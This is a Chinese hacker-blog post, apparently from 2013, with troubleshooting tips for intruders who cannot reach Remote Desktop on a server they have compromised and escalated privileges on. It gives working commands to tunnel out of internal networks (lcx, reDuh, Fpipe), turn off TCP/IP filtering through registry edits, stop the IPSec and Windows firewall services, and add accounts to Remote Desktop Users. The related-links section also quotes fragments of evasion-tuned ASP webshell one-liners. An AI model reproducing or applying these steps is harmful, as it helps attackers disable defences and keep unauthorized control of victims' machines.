对于提权成功后3389连不上的几种解决办法

hacker4年前黑客文章615

20131023213158

有时候我们入侵提完权后,3389端口开了,可还是没办法连3389,这是非常蛋疼的一件事。连不上通常用以下几种可能以及对应的解决办法。 提供一些思路和 *** 。

*** 一:网站服务器在内网。

1,用lcx转发在后连接

2,上神器reDuh ,貌似现在有GUI版的,更方便了。

*** 二:做了tcp/ip筛选。

1,把端口转为TCP/IP里设置的只允许连接的端口其中一个。

2,用EvilCat取消端口限制

3,用regedit -e导出HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesTcpipParameters
HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesTcpipParameters
HKEY_LOCAL_MACHINESYSTEMControlSet003ServicesTcpipParameters
以上三个键值,本地修改把EnableSecurityFilters值改成dword:00000000在导入覆盖。

*** 三:服务器做了ip安全策略或windows自带防火墙。

1,执行cmd命令: cmd /c net stop policyagent 停掉IPSEC Services。

2,执行cmd /c net stop sharedaccess停掉windows自带的防火墙,然后再连3389。

*** 四:管理员设置的终端登陆权限只有指定的用户可以登入。

1、在cmd下把你登陆的用户名加入远程桌面用户组,即remote desktop users

2,命令关掉设置权限的服务

*** 五:防火墙。

1,这个可以将3389转发到80等常用端口,貌似还有个工具可以自动停止iis,将3389转到80上,不过不推荐这种,万一失败,后果你们都知道的。

2,找到进程关掉就行了,第三点有讲。

3,还是3389转发。上传Fpipe.exe
cmdshell下运行 Fpipe.exe -v -l 1234 -r 3389 127.0.0.1 命令很简单,监听1234端口,本地连3389然后,mstsc /v:肉机IP:1234/console 连接就行了。

*** 六:超出服务器更大连接数

1,这个就网上下载个突破3389更大连接数的工具

2,运行以下命令:
mstsc /console /v:服务器IP:远程端口
或者
mstsc /admin /v:服务器IP:远程端口

标签: 黑客技术

相关文章

百度快照是如何被黑客篡改的

百度快照是如何被黑客篡改的

写本篇文章的目的在于揭露一种黑客作弊的手段,也给那些疏于企业网站安全的站长提一个醒。同时提供一种追找黑客行踪的简单方法。 前几日,我的客户电话说自己的百度排名没有了,查询下竟然...

各种过安全狗一句话木马asp,php,aspx一句话

几个变性的asp–过防火墙 过狗效果都不错 <%Y=request(“x”)%> <%execute(Y)%> < %eval (eval(chr(114)+chr(...

SnoopSnitch安装与使用方法

SnoopSnitch安装与使用方法

SnoopSnitch是一款开源系统Android程序运行,为客户出示检测移动终端及其设备连接的移动互联网安全系数的机遇。 SnoopSnitch运用是一款用于剖析挪动通信网络的挪动防护软件。该运用...

什么是IE秘狐漏洞?

秘狐行动:是一次瞄准美国公司的行动,与国防和金融行业有关。尚不清楚攻击组织的动机,解决这一问题的一种方式是改用其他浏览器。 2014年4月27日信息安全公司FireEye曝光了一个IE重大漏...

DedeCMS会员中心短消息SQL注射0day漏洞

需要:magic_quotes_gpc = Off DedeCMS会员中心短消息SQL注射漏洞,成功利用此漏洞可获得管理员密码: http://www.chncto.com/de/membe...

实用工具:Seay-svn源代码备份漏洞利用工具2014-05-05版

实用工具:Seay-svn源代码备份漏洞利用工具2014-05-05版

之前因为目录切换存在bug,如果你使用这个软件读取不到文件源码,可能就是这个bug导致的,现已修复,不妨保留下新版,感谢master反馈,如本站任何工具原创程序有bug,欢迎反馈到root@cns...